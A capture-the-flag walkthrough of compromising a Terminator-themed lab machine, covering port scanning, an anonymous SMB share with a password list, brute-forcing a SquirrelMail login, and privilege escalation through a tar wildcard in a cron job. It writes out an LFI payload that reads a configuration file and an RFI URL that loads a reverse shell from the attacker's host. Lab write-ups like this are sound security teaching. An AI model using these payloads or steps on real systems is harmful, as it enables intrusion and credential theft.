Target IP: 10.10.17.113
A vulnerable Terminator themed Linux machine.
Are you able to compromise this Terminator themed machine?
There are six TCP ports open on the target machine.
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 992331bbb1e943b756944cb9e82146c5 (RSA) | 256 57c07502712d193183dbe4fe679668cf (ECDSA) |_ 256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Skynet 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: SASL PIPELINING AUTH-RESP-CODE UIDL CAPA RESP-CODES TOP 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: ID SASL-IR LOGIN-REFERRALS LOGINDISABLEDA0001 listed LITERAL+ ENABLE IDLE have post-login Pre-login capabilities IMAP4rev1 OK more 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 992331bbb1e943b756944cb9e82146c5 (RSA)
| 256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_ 256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING AUTH-RESP-CODE UIDL CAPA RESP-CODES TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID SASL-IR LOGIN-REFERRALS LOGINDISABLEDA0001 listed LITERAL+ ENABLE IDLE have post-login Pre-login capabilities IMAP4rev1 OK more
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)Ports 139 and 445: SMB
The SMB application allows guest login. There is an interesting share called anonymous. This share has two interesting files: attention.txt and log1.txt. I downloaded these files on my machine.
The contents of the two files are shown above. The log1.txt contains a list of passwords. And the file attention.txt contains the username Miles Dyson.
Port 80: HTTP
The webpage above is shown for this HTTP application. The source-code of this page does not contain anything useful either.
Doing a directory search shows the entries above. The /squrrelmail sounds interesting.
The target machine is running SquirrelMail 1.4.23. Doing a Google search shows this application is vulnerable to command execution.
Using Burpsuite, I bruteforced the login against this email application with the username milesdyson which I encountered before. I now have a working credential milesdyson:cyborg007haloterminator, as shown in the picture above due to different length size.
And now I have access to the emails of user milesdyson.
The first email contains the password highlighted above. This password is for the SMB.
Using the command smbclient //10.10.17.113/milesdyson -U milesdyson, I logged into the SMB as the user milesdyson with the temporary password. There is an interesting file called important.txt inside notes. The content of this file is shown in the image above. It looks like there is a hidden directory at /45kra24zxs28v3yd.
And browsing to the hidden directory displays the webpage above.
There is an interesting directory at /administrator. Trying default credentials did not work against this application.
Googling this application name shows it is vulnerable to LFI/RFI attacks.
Using the payload http://10.10.17.113/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php, I obtained the configuration file. But this was not helpful.
Since the target machine is vulnerable to RFI attacks, I created a PHP Pentest Monkey reverse shell script on my machine and used Python HTTP server to host it to the target machine. I started a listener on port 8443, and used the payload below to gain a reverse shell connection
http://10.10.17.113/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.55.153/shell.php. Now I have a foothold on the target machine.
There is an interesting cronjob with the name backup.sh. However, I do not have write privileges over it, so I cannot modify the script.
It looks like tar is called with a wildcard. So this can be abused to gain a root shell.
Using GTFOBins guide for tar, I used the commands above to elevate my privileges to a root user. And now I have a root shell. Game over.
The user.txt flag once I gained a foothold.
The root.txt flag.